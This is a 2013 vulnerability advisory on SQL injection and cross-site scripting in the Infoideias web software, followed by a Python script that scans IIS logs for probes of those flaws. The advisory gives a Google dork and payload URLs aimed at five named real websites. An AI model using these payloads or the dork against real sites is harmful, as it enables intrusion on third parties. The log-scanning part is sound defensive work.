#********************************************************************************
# Exploit Title : Infoideias Multiple Vulnerabilities
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : http://www.infoideias.com.br
#
# Tested on : Windows 7 , Linux
#
# Google Dork : intext:"Powered by Infoideias"
#
# Date : 2013/09/10
#
# --------------------------------------------------------------------
# Exploit : SQL Injection
#
# Location : [Target]/incrio/calendar.asp?auxid=[SQL Injection]
#
# Proof:
#
# http://www.americansocietyrio.org/incrio/calendar.asp?auxid='
#
# http://www.bcsrio.org.br/incrio/calendar.asp?auxid='
#
# http://www.christchurchrio.org.br/incrio/calendar.asp?auxid='
#
# http://www.riosocieties.com.br//incrio/calendar.asp?auxid='
#
# http://riosocieti.dominiotemporario.com/incrio/calendar.asp?auxid='
#
# --------------------------------------------------------------------
# Exploit 2 : Cross Site Scripting
#
# Location : [Target]/incrio/login.asp?button=Login&login=[Cross Site Scripting]
#
# Proof:
#
# http://www.americansocietyrio.org/incrio/login.asp?button=Login&login= "/>
#
# http://www.bcsrio.org.br/incrio/incrio/login.asp?button=Login&login= "/>
#
# http://www.christchurchrio.org.br/incrio/login.asp?button=Login&login= "/>
#
# http://www.riosocieties.com.br/incrio/login.asp?button=Login&login= "/>
#
# http://riosocieti.dominiotemporario.com/incrio/login.asp?button=Login&login= "/>
#
###################### discovered by : ACC3SS ######################
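
An added detection example, not part of the original advisory: it scans IIS W3C access logs for requests to the two endpoints listed above whose auxid or login values carry a non-numeric id or HTML-breakout characters. The W3C log layout, the assumption that auxid is a numeric id, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Endpoint -> (parameter, finding label), both taken from the advisory above.
WATCHED = {
    "/incrio/calendar.asp": ("auxid", "sqli"),
    "/incrio/login.asp": ("login", "xss"),
}
HTML_BREAKOUT = re.compile(r"[\"'<>]")  # can close an attribute or open a tag

def suspicious(stem, query):
    """Return the finding label for one request, or None if it looks benign."""
    path = re.sub(r"/+", "/", stem).lower()  # IIS paths are case-insensitive
    for endpoint, (param, label) in WATCHED.items():
        if not path.endswith(endpoint):
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() != param:
                continue
            # Assumption: auxid is a numeric id, so any non-digit is abnormal.
            if label == "sqli" and not re.fullmatch(r"[0-9]+", value):
                return label
            if label == "xss" and HTML_BREAKOUT.search(value):
                return label
    return None

def scan_iis_log(lines):
    """Yield (client_ip, label, stem, query) for flagged W3C log entries."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        label = suspicious(row.get("cs-uri-stem", ""), "" if query == "-" else query)
        if label:
            yield row.get("c-ip", "-"), label, row["cs-uri-stem"], query

# Constructed sample log (documentation-range IPs), not real traffic.
SAMPLE = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-09-10 10:00:01 GET /incrio/calendar.asp auxid=12 203.0.113.5 200
2013-09-10 10:00:07 GET /incrio/calendar.asp auxid=%27 198.51.100.9 500
2013-09-10 10:00:09 GET /incrio/login.asp button=Login&login=alice 203.0.113.5 200
2013-09-10 10:00:15 GET /incrio/Login.asp button=Login&login=%22/%3E 198.51.100.9 200
""".splitlines()
```

Hits from this scan show which clients probed the affected parameters; the underlying fix remains parameterized queries for auxid and HTML-encoding of the reflected login value.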